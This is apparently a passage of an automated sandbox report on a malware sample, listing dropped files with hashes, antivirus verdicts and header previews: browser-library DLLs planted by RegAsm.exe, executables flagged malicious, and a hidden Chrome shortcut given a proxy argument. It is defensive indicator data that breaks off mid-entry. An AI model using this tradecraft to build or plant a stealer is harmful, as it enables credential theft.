Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D5.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4788
Entropy (8bit):	4.54634982809238
Encrypted:	false
SSDEEP:	48:cvIwWl8zscuJg77aI9/1D2WpW8VYBYm8M4J5B2Fao+q8v5BCDukUJd:uIjfDI7B1DX7VJJaKiD/UJd
MD5:	D92AD6C0B3DE41ACBC7B26B152340051
SHA1:	F32D99F3099B0600A4BFA2F698D27A426FF3B85C
SHA-256:	26383EFC983F2967A63597C6B40F2CB031AF0A0F4806F02A62BE138B6CC347E2
SHA-512:	9455EFA5661F32ECB11C8E39B67F1B8DFEE5FAB61A1153CA0EAFF0FA45667452BAFCFF3138EDE0C2C91F256BA530F395694D76D06130ECA514E8CC2F3D720E86
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="485680" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4E.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81756
Entropy (8bit):	3.046762997023841
Encrypted:	false
SSDEEP:	1536:aQHa9N/zbm6CTr2ahXQR16drlfhphR2AnlG5Vbg54:aQHa9N/zbm6CTr2ahXQj6drlfhphR2AG
MD5:	2CDDADB645DA81FA4CCF481BF24B2AD2
SHA1:	FBE3F725DA02BA90DD0A356EE9B094A584D6BE2A
SHA-256:	5BC0D6656DA7F7D01F72D6C31377652AB71ED5BF7985F4BEF36C653D7BE917E1
SHA-512:	BB441A34FAD3DF7E36A7E937A16670EF91233F3649614C717A63060806E3680D9FE4DA1AB3E1471535D739B825E8871DB5689F98E8B9941D1D3F6923A7C7206E
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE404.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78954
Entropy (8bit):	3.03724729491728
Encrypted:	false
SSDEEP:	1536:aSDGw8MbnPbO2ItqbibAKKhLYsFaChsR9e:aSDGw8MbnPbO2ItqbibARhLYsFaChsRw
MD5:	6C82EC0BB148BFE12A4C31034CF5E5B9
SHA1:	F3DB64868190378E99E36D0FABAAE93E4BFC831F
SHA-256:	DF26A5034D033565EDFF55C27CE3E0CF3D6B209C52C33E0154686AB3999DE1FF
SHA-512:	48126841D6B5C4C356355F993A5D5651B627C57D550BFB581D7DDBDDC3BA3BAD0D69EB53EA6BA5C9E602FF5C1CAD01CE16834B3EBE2931CE8E7E512675E8EC21
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE974.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6957379731988804
Encrypted:	false
SSDEEP:	96:TiZYW1LRQBWyYzYZWHMKiH2YEZjtUtFiHMIEmw45OZaAhSMVeBI6f5:2ZDBy0LNOaAhSMVe+6f5
MD5:	E1F52B48747326D50D6621549FB15F71
SHA1:	F36DCBED21A60892F9B50E1EE112AF6A76AE83BD
SHA-256:	2542B8324C5B7A898923E9FEA4F68D34C7AE9AC324DCE6A84F9C32A912343706
SHA-512:	D9E93D088C96C9E02E53B88A97B97B17D46B9EAC5CE5C842E3DFCFA27343FD1924DD7A23896BDA30D101E409E4A6F94FE3F2BF7F2EF964E47F9AD0459C3F298A
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1D.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6852329480356922
Encrypted:	false
SSDEEP:	96:TiZYWjEs0OYnYUWPHBnYEZif0tFioMnE0wxotlCjaPh5oMzVogILf3:2ZDbQsk1XCjaPhGMzVo3Lf3
MD5:	C4791800640557D0CC2284813F3F8D47
SHA1:	DF19AAB714B64A7BF70F8EC0803D7C25A9C28745
SHA-256:	A6F6F5087BFCD54131A9DE625D09194C5DA72C7EBD68846730F1C8EED76442B8
SHA-512:	B04EABD1A4CBE3E1D3CE62C654C29D354296B95381EEAEC4545BFF8FFD34F85AEC7A9C8AAAC0546A5C3EFE5F0C63F5406C2C14EA6682E6BCEF3A1069BC09C319
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\jewkkwnf\jewkkwnf.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8684256
Entropy (8bit):	7.036585407539768
Encrypted:	false
SSDEEP:	98304:yvOB51QmIWth3e1PTbEYBkQyShbkqdwOyAuYJvdVuWFY:y+51/Iqh3e1PTbE7QbCqeYbM8
MD5:	B5887A19FE50BFA32B524AAAD0A453BC
SHA1:	CD1F3905959CD596C83730A5B03CEEF4E9F2A877
SHA-256:	FCE5CBEEC1EB5274FC3AFA55E57FB2F724688CB9D4661A8A86716011493564C7
SHA-512:	5B9914C94101B53314B14335E687552E5DA0A4085AFB826AE94F45769E9B1E66A35624B6E6B60257514F4ADF2ACC5C9E048BFA3A24AAFB891D203E3011C02538
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....P..............................&... ...@....@.. ....................... ......I.....@..................................&..K....`.............................6&............................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc.......`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\xprfjygruytr\etzpikspwykg.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10902016
Entropy (8bit):	7.966543494488889
Encrypted:	false
SSDEEP:	196608:+Oix0DABAAtXftiAf6xz1Z5PVm6Gcj+TqnC6fOaSz/n2EgfY0gEMtw1:QOcXfC7bE9fjCfY0gg
MD5:	025EBE0A476FE1A27749E6DA0EEA724F
SHA1:	FE844380280463B927B9368F9EACE55EB97BAAB7
SHA-256:	2A51D50F42494C6AB6027DBD35F8861BDD6FE1551F5FB30BF10138619F4BC4B2
SHA-512:	5F2B40713CC4C54098DA46F390BBEB0AC2FC0C0872C7FBDFDCA26AB087C81FF0144B89347040CC93E35B5E5DD5DC102DB28737BAEA616183BEF4CAECEBFB9799
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...0..f..........#.................o..........@.......................................... ....................................................<...........@S..`*..........................................P...(....R..8............ .. ............................text............................... ..`.rdata.. ...........................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...:(......................... ..`.text1..X.... ......................@....text2...M...0...N..................`..h.rsrc................T..............@..@........................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 05:47:16 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4685717994045424
Encrypted:	false
SSDEEP:	48:8S2d5TvGk0lRYrnvPdAKRkdAGdAKRFdAKR6P:8SIbH7
MD5:	688E14E0721892FDF09FE96987D1BC52
SHA1:	C5D49F0738729F18C797B376E3C91EED39A9A2A8
SHA-256:	201DCBE88DBD9698B02DBB81FB6065309EE874C4ECB3AB666C35BF0C0E5E8A1C
SHA-512:	FD5EFAE5C466F73BDEE3ECDEC270E5BF7EA2CA56E1AF7884C52BDF89CE2B8ED94594DEE2C6EB3F1C631A3AB0D963501E7C4D17E95F28101C45592D1CF7CBB2B3
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......,.......W....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.3..PROGRA~1..t......O.IEW.5....B...............J.......j.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW@2....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.2..Chrome..>......CW.VEW.2....M.....................7...C.h.r.o.m.e.....`.1.....EW.2..APPLIC~1..H......CW.VEW.2..........................7...A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.5.........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\userEHJKFCGHID.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342568
Entropy (8bit):	7.985380404862572
Encrypted:	false
SSDEEP:	6144:0C64X+qCBZeXyHC4/b9SvOu0d6C8fFsvzso5iYpCpLKHsqtbNEO:0C64X+BBpC2b8OuqwFOsO5wlKHsqtbNt
MD5:	5CDADA1CDA3C68A8CA61405458E1E587
SHA1:	5E481E20B637BD39D25057FA026DAAAD72BD1ACE
SHA-256:	10B87FC523E14C20DD6A13F1EDE571D84F7A760052F6D63B6DEB992C4B76F1ED
SHA-512:	F3D4F8423B43E32AF48E2CED88C26F29E4A78D998D3886843D2C4D0C7F3AC9638E57A34CDC50E833030D649F1509242FB176079C29DA7E837FA937D5A27E688B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................~&... ...@....@.. ...................................`.................................$&..W....@..................(&...`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`&......H...........,............................................................`pN.7....n.....Q.......d.e..$[....A..B......C.U1..#.^..........5......6i.%....^Ea9..[.......ct...q...Z.;..6.z.[^..X.'./......VHW,..w]..~5..".O.x...2.`....b..2.X.>=\.l.....#..x.S..,.~.,"...z.<...c.Z....m%}R......?G.9.X.....s$..........F.L.....@\{..J...~\.T.@C....:........q......n........z..l......X3. ...k...$.Dq.4....5?......b....__c.83..j......l.'..Z..{e."7.I.'.......j...T..:./.J.Q.

C:\Users\userFBKKJEBFID.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	290344
Entropy (8bit):	7.980772850522231
Encrypted:	false
SSDEEP:	6144:UmCasy4lZs8PdTTuC9RKXAmlxp5T9iynBw496NlRlEO:UCsVs8lThUBxp6+n9YRlEO
MD5:	6F99968CC27D2D6A07A921AB703A5D5D
SHA1:	1B1F72A9CA325B2D7B01F66AE1EBEF646B167EC0
SHA-256:	5EF282479F0C6F082F15D3F878F8C4B418259EBC6D7941A472E0F28CDCC43C88
SHA-512:	3EA9CBBB6AB281C02AEF8473F40EC00412A05B613D4A45E228E06F4A585AE25BA35DC2EB2A772CF9AB38E86A05B67A4388B4EF306483EF030666D1C242BA370A
Malicious:	true
